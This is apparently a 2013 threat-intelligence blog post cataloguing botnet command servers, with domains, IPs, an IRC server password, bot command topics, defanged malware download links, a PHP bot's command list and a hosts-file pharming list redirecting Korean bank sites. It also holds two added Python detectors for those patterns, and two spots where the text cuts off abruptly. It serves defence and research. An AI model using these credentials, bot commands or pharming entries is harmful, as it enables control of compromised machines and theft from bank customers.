Month: March 2013

xixbh.net (ngrbot irc botnet hosted by oneandone.net)

Resolved xixbh.net to 212.227.83.111, 213.165.68.138, 85.25.86.198
Server: xixbh.net (alternate domains: xixbh.com gigasbh.org)
Port: 1863
Server password: jobs
Channel: #jobs
Topic for #jobs is: !dl hxxp://hotfile.com/dl/200451226/2ff4c3f/orf4Duu.html
Topic for #jobs set by x at Fri Mar 29 13:40:52 2013
SSL is required to connect to this server.
This is the same guy as these previous posts.

dictionarysrnifty.no-ip.org (Athena irc botnet hosted by infiumhost.com)

Resolved dictionarysrnifty.no-ip.org to 188.190.99.19
Server: dictionarysrnifty.no-ip.org
Port: 9001
* I have 83 clients and 0 servers
* 83 451 :Current local users 83, max 451
Channel: #alpha
Topic for #alpha is: !botkill.start
Topic for #alpha set by LK at Fri Mar 29 10:30:08 2013
All users are also joined to the channel #lobby on connection.

truboot.org (Athena http botnet hosted by edenhost.com)

Resolved truboot.org to 94.242.205.226
Server: truboot.org
Gate file: /at/gate.php
This is the http version of the Athena irc bot, which has graced this blog many times.
Login page located at truboot.org/at/login/index.php
Hosting infos: http://whois.domaintools.com/94.242.205.226

192.211.54.156 (Page view botnet hosted by incero.com)

Server: 192.211.54.156
Url locations: /Programs/links/Maki/, /Programs/links/Angelo/
The malware opens all the pages in each folder and visits any urls that are contained in them.
Current urls:
<meta HTTP-EQUIV="REFRESH" content="0; url=http://minecraftadminhack.blogspot.com/">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://tf2itemsgenerator.blogspot.com/">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.youtube.com/watch?v=UUTZW2AjhFI">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://minecraftadminhack.blogspot.com">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://youtu.be/AhPTX1n_8p8">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://f65a1cad.yyv.co">
<meta HTTP-EQUIV="REFRESH" content="0; url=http://14b3e31e.linkbucks.com">
<META
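The mechanism described above (open every landing page in the folder, follow whatever the page points at) written out in code, as an added example that is not the botnet's own code. The sample pages are constructed from the tags listed above; the single-quoted, five-second variant is made up to show that the parser handles a non-zero delay and mixed case, and the viewport tag is there as a negative case.

```python
"""Extract meta-refresh redirect targets the page-view bot would follow.
Added example; the HTML below is constructed from the tags on this page."""
from html.parser import HTMLParser
import re

# Constructed sample of the pages served under /Programs/links/<name>/
SAMPLE_PAGES = [
    '<meta HTTP-EQUIV="REFRESH" content="0; url=http://minecraftadminhack.blogspot.com/">',
    '<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.youtube.com/watch?v=UUTZW2AjhFI">',
    # made-up variant: single quotes, lower-case http-equiv, 5 second delay
    "<html><head><META http-equiv='refresh' CONTENT='5;URL=http://14b3e31e.linkbucks.com'></head></html>",
    '<meta name="viewport" content="width=device-width">',  # not a refresh tag
]

# "<delay>; url=<target>", optionally quoted, case-insensitive
_REFRESH_RE = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*['\"]?(.*?)['\"]?\s*$", re.IGNORECASE)


class MetaRefreshParser(HTMLParser):
    """Collect (delay_seconds, url) from every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names for us
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        m = _REFRESH_RE.match(a.get("content", ""))
        if m:
            self.targets.append((int(m.group(1)), m.group(2)))


def extract_refresh_targets(html):
    """Return [(delay, url), ...] found in one page."""
    p = MetaRefreshParser()
    p.feed(html)
    p.close()
    return p.targets


def collect_targets(pages):
    """Union, in first-seen order, of the redirect targets across a folder
    of pages: the set of sites the bot ends up sending page views to."""
    seen, out = set(), []
    for page in pages:
        for _delay, url in extract_refresh_targets(page):
            if url not in seen:
                seen.add(url)
                out.append(url)
    return out


if __name__ == "__main__":
    for url in collect_targets(SAMPLE_PAGES):
        print(url)
```

Pointing this at a copy of one of the link folders gives the list of sites the bot is currently inflating views for; the delay is kept because a non-zero value is a sign that a page was written for human visitors rather than for the bot.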

irc.benjol.tk (Linux bots hosted in France Roubaix Ovh Systems)

Resolved: [irc.benjol.tk] To [37.59.42.103]
Resolved: [irc.benjol.tk] To [46.45.183.189]
The bot file begins with a GIF89a image header followed by a few bytes of binary data, then the script source:
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password>   //login to the bot
 * .logout            //logout of the bot
 * .die               //kill the bot
 * .restart           //restart the bot
 * .mail <to>

img14.poco.cn (HTTP Banking trojan hosted in China Shanghai Chinanet Shanghai Province Network)

Resolved: [img14.poco.cn] To [101.226.200.132]
Resolved: [img14.poco.cn] To [101.226.200.130]
Resolved: [img14.poco.cn] To [61.183.42.151]
Resolved: [img14.poco.cn] To [101.226.200.134]
Resolved: [img14.poco.cn] To [101.226.200.152]
Resolved: [img14.poco.cn] To [61.183.42.150]
Samples:
hxxp://www.ccfyi.com/notepad.exe
hxxp://www.ccfyi.com/mstsc.exe
hxxp://www.ccfyi.com/cc.txt
img14.poco.cn GET /mypoco/myphoto/20130323/19/874940020130323195257040.jpg
hxxp://174.139.56.114:54321/1.txt
1.txt:
67.198.167.37 keb.co.kr
67.198.167.37 keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 www.citibank.co.kr
67.198.167.37 www.citibank.co.kr
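1.txt is in hosts-file format: every line pins a Korean bank hostname to 67.198.167.37, so a machine that applies these entries (presumably to its hosts file; an assumption, the page only shows the list) is sent to the attacker's server whenever it tries to reach keb.co.kr or citibank.co.kr. A checker for that pattern, as an added example that is not the trojan's code: it parses hosts-format text, skips the loopback and private entries that benign hosts files contain, and flags public IPs claiming either a watchlisted bank domain or several unrelated registered domains at once. The watchlist, the localhost line and the simplified .co.kr domain split are constructed assumptions for the example.

```python
"""Flag hosts-file pharming entries of the kind seen in 1.txt.
Added example; the sample text is constructed from the lines on this page."""
import ipaddress

# Constructed from 1.txt above, plus one benign entry as a negative case
SAMPLE_1_TXT = """\
67.198.167.37 keb.co.kr
67.198.167.37 keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 www.citibank.co.kr
127.0.0.1 localhost   # benign: normal hosts-file content
"""

# Hypothetical watchlist of registered bank domains (assumption for the example)
WATCHLIST = {"keb.co.kr", "citibank.co.kr"}

# Second-level labels under which .kr and similar registries hand out names;
# a deliberately small stand-in for a real public-suffix list (assumption).
_SECOND_LEVEL = {"co", "or", "ne", "go", "ac", "com", "net", "org"}


def parse_hosts(text):
    """Return [(ip, hostname), ...]; comments, blanks and malformed lines are dropped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue  # first field is not an IP: not a hosts entry
        for name in parts[1:]:
            entries.append((ip, name.lower().rstrip(".")))
    return entries


def registered_domain(host):
    """Collapse www.keb.co.kr -> keb.co.kr (simplified suffix handling)."""
    labels = host.split(".")
    if len(labels) >= 3 and labels[-2] in _SECOND_LEVEL:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def _is_public(ip):
    addr = ipaddress.ip_address(ip)
    return not (addr.is_loopback or addr.is_private or addr.is_unspecified)


def find_pharming(text, watchlist=WATCHLIST):
    """{ip: [hostnames]} for watchlisted domains pinned to a public address.
    Duplicated lines (as in the real 1.txt) are reported once."""
    hits = {}
    for ip, host in parse_hosts(text):
        if not _is_public(ip):
            continue  # sinkholing to loopback is a common legitimate use
        if registered_domain(host) in watchlist:
            names = hits.setdefault(ip, [])
            if host not in names:
                names.append(host)
    return hits


def shared_ip_domains(text, min_domains=2):
    """Public IPs that claim names from at least `min_domains` distinct
    registered domains: one attacker host impersonating several sites,
    which catches banks that are not on the watchlist."""
    by_ip = {}
    for ip, host in parse_hosts(text):
        if _is_public(ip):
            by_ip.setdefault(ip, set()).add(registered_domain(host))
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) >= min_domains}


if __name__ == "__main__":
    print(find_pharming(SAMPLE_1_TXT))
    print(shared_ip_domains(SAMPLE_1_TXT))
```

Run against a victim's hosts file (or a fetched 1.txt) the first function answers "which watched banks are hijacked and to where", and the second surfaces the attacker IP even when the watchlist is stale, since a legitimate hosts file almost never maps multiple unrelated second-level domains to one public address.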

turnaroundhot.info (Betabot http botnet hosted by dataclub.biz)

Resolved turnaroundhot.info to 46.183.217.111
Server: turnaroundhot.info
Gate file: /hot/order.php
Alternate domains: fivestarintack.ws/live/order.php, tstartedtoearly.info/hot/order.php
The owner seems to be using it to direct views towards www.twitch.tv/bowserdubs, where an Estonian-American is currently streaming Runescape.
Hosting infos: http://whois.domaintools.com/46.183.217.111